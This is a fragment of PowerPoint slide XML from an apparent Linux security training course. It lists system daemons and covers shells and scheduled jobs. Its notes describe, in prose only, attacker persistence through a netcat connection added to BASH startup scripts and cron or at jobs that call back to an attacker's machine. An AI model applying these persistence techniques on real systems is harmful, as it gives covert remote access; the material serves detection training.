              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tasks (see below) at boot time and executes them. Useful if you have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> jobs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scheduled, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>do not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>machine all the time. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>td</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>jobs queued by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘at’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>crond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Automatic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>task scheduler. Manages the execution of tasks that are executed at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>regular, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>but infrequent intervals, such as rotating log files, cleaning up /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directories, etc.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dhcpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Implements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the Dynamic Host Configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(DHCP) and the Internet Bootstrap Protocol (BOOTP). Used to lease out IP addresses to remote machines. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fetchmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Daemon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to fetch mail at regular intervals from mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>daemon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>gated: Routing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>daemon that handles multiple routing protocols and replaces routed and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>egpup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. It supports a variety of routing protocols including RIP versions and DCN HELLO protocol, OSPF version and EGP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>versions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hypertext transfer protocol daemon to provide dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>files and CGI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>service.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29511465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inetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Listens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for service requests on network connections, particularly dial-in services. This daemon can automatically load and unload other daemons (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>telnetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>thereby economizing on system resources. Red Hat and Mandrake Linux replaced this by xinetd. Others still use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SuSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>many distributions, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will execute scripts in the file /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inetd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: This is the firewall daemon, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that the student will run into on missions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>daemon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>named: Provides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>services.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nfsd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for exporting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> shares when requested by remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>systems.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ntp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Network Time Protocol.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nfslock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Starts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and stops </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file locking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>numlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Locks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>numlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> key at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>runlevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>change.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pcmcia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Generic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>services for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PCMCIA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cards in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>laptops.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>portmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Needed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for Remote Procedure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Calls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>postfix: Mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>transport </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>agent, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which is a replacement for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the default on desktop installations of Mandrake. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>daemon.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23538994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routed: Manages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>routing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rpcbind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: RPC bind.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Needed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for running Samba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>file sharing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>smtpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mail Transfer Protocol, designed for the exchange of electronic mail messages. Several daemons that support SMTP are available, including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smtpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsmtpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>qmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="881390">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>snmpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Provides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple Network Management Protocol support for local simple network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="881390">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure shell protocol to enable secure remote management of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hosts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="881390">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syncd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File synchronization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="881390">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syslogd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Manages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="881390">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xinetd: More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>modern replacement for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. It supports a variety of network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>services, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as it allows for similar kinds of access filters to the ones used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in conjunction with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. xinetd replaces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as the default network services daemon for a few distros. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38867682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shell is a wrapper for the Linux console.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>There are four common shell types and each one is unique in the respect of the features and shell syntax. Most modern operating systems, the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>’ is symbolically linked to BASH, which results in it being the default shell type. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>A terminal is used to interact with a shell. A shell’s configuration and customization can be found in startup scripts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Bourne Again Shell (BASH) means they may need to be manually checked, because there can be unwanted additions. A simple example… this command is adding a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> connection to an attacker IP on a specific port anytime the user runs BASH interactively and runs a shell session. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30629978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81390">
              <a:spcBef>
                <a:spcPts val="289"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="289"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Scheduled jobs can serve as a persistence mechanism when configured to periodically connect to an attackers machine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The lesson has discussed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>crond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> as a means to schedule, but there is also the ‘at’ for executing one-time commands. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The at command will show up in the scheduled processes and associated /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/spool/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>atjobs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/spool/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>atspool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The queue of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cronjobs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for specific users can be found in the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
